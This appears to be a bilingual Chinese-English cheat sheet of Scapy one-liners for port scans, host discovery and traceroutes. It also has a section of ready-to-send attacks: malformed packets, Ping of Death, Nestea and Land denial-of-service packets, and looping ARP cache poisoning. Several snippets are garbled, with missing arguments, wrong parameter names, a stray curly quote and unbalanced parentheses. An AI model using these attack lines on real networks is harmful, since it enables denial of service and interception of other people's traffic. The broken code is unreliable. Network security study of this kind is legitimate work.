https://thepacketgeek.com/scapy-p-04-looking-at-packets/
http://biot.com/capstats/bpf.html filter语法
http://www.secdev.org/projects/scapy/doc/usage.html#first-steps
http://www.cnblogs.com/xuanhun/p/5802573.html
https://fossies.org/dox/scapy-2.3.1/clas*y_1_1arch_1_1pcapdnet_1_1L2dnetSocket.html 源码
Simple one-liners
-
ACK Scan
- ans, unans = sr(IP(dst="www.slashdot.org")/TCP(dport=[80,666],flags="A"))
- 我们发现未过滤的端口(在响应数据包)
for s,r in ans:
if s[TCP].dport == r[TCP].sport:
print str(s[TCP].dport) + "is unfiltered"
发现过滤的端口(在未响应的数据包)
for s in unans:
print str(s[TCP].dport) + "is filtered"
- Xmas Scan
ans, unans = sr(IP(dst="192.168.1.1")/TCP(dport=,flag="FPU"))
检测到RST响应。则揭露在目标的关闭端口
- IP Scan
ans, unans = sr(IP(dst="192.168.1.1",proto=(,))/"SCAPY",retry=)
探测支持的协议
- ARP Ping
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.1.0/24"),timeout=)
发现网络中存活的主机 ans.summary(lambda(s,r): r.sprintf("%Ether.src% %ARP.psrc%"))
显示存活主机的IP和mac地址 或者执行:
arping("192.168.1.*)
- ICMP Ping
ans, unans = sr(IP(dst="192.168.1.1-254")/ICMP())
ans.summary(lambda(s,r): r.sprintf("%IP.src% is active"))
- TCP Ping
ans, unans = sr(IP(dst="192.168.1.*")/TCP(dport=80,flag="S"))
如果主机有防火墙,那么可以尝试TCP Ping。
ans.summary(lambda(s,r): r.sprintf("%IP.src% is alive"))
- UDP Ping
If all else fails there is always UDP Ping which will produce ICMP Port unreachable errors from live hosts. Here you can pick any port which is most likely to be closed, such as port 0: ans,unans = sr(IP(dst="192.168.*.1-10")/UDP(dport=0)) Once again, results can be collected with this command:
ans.summary(lambda(s,r): r.sprintf("%IP.src% is alive"))
- Classical attacks
畸形包:
send(IP(dst="10.1.1.5",ihl=2,version=3)/ICMP())
死亡之ping:
send(fragment(IP(dst="10.0.0.5")/ICMP()/("X"*60000)))
Nestea attack:
send(IP(dst=target, id=42, flags="MF")/UDP()/("X"*10))
send(IP(dst=target, id=42, frag=48)/("X"*116))
send(IP(dst=target, id=42, flags="MF")/UDP()/("X"*224)) Land attack:
send(IP(src=target,dst=target)/TCP(sport=135,dport=135))
- ARP cache poisioning
典型的ARP缓冲毒化
send(Ether(dst=clientMAC)/ARP(op="who-has",psrc=gateway,pdst=client),inter=RandNum(10,40),loop=1) ARP cache poisoning with double 802.1q encapsulation:
send(Ether(dst=clientMAC)/Dot1Q(vlan=1)/Dot1Q(vlan=2)/ARP(op="who-has",psrc=gateway,pdst=client),inter=RandNum(10,40),loop=1)
- TCP Port Scanning
发送一个TCP SYN在每个端口。等待一个SYN-ACK或者一个RST或者一个ICMP错误:
res,unans = sr(IP(dst="target")/TCP(flags="S",dport=(1,1024)) 可能的结果:开放端口
res.summary(lfilter=lambda(s,r): (r.haslayer(TCP) and (r.getlayer(TCP).flags & 2)))
- IKE Scanning
IKE ----因特网密钥交换协议 尝试辨认出VPN的接线器通过发送ISAKMP Association proposal(密钥管理协议)并且接受这回答: res, unans = sr(IP(dst="192.168.1.*")/UDP()/ISAKMP(init_cookie=RandString(8),exch_type="identity prot.")/ISAKMP_payload_SA(prop=ISAKMP_payload_Proposal()) 可视化的结果:
res.nsummary(prn=lambda(s,r): r.src, lfilter=lambda(s,r): r.haslayer(ISAKMP))
- TCP SYN tracerute
ans, unans = sr(IP(dst="4.2.2.1",ttl(1,10))/TCP(dport=53,flags="S“))
可能的结果:
ans.summary(lambda(s,r): r.sprintf("%IP.src%\t{ICMP:%ICMP.type%}\t{TCP:%TCP.flags%}"))
192.168.1.1 time-exceeded
68.86.90.162 time-exceeded
4.79.43.134 time-exceeded
4.79.43.133 time-exceeded
4.68.18.126 time-exceeded
4.68.123.38 time-exceeded
4.2.2.1 SA
- UDP traceroute
UDP由于没有握手,我们需要给一个应用载体(DNS,ISAKMP,NTP等)来得到响应:
res,unans = sr(IP(dst="target", ttl=(1,20))/UDP()/DNS(qd=DNSQR(qname="test.com")) 使用下面的代码来得到路由:
res.make_table(lambda(s,r): (s.dst, s.ttl, r.src))
- DNS traceroute
ans,unans = traceroute("4.2.2.1",14=UDP(sport=RandShort())/DNS(qd=DNSQR(qname="thesprawl.org")))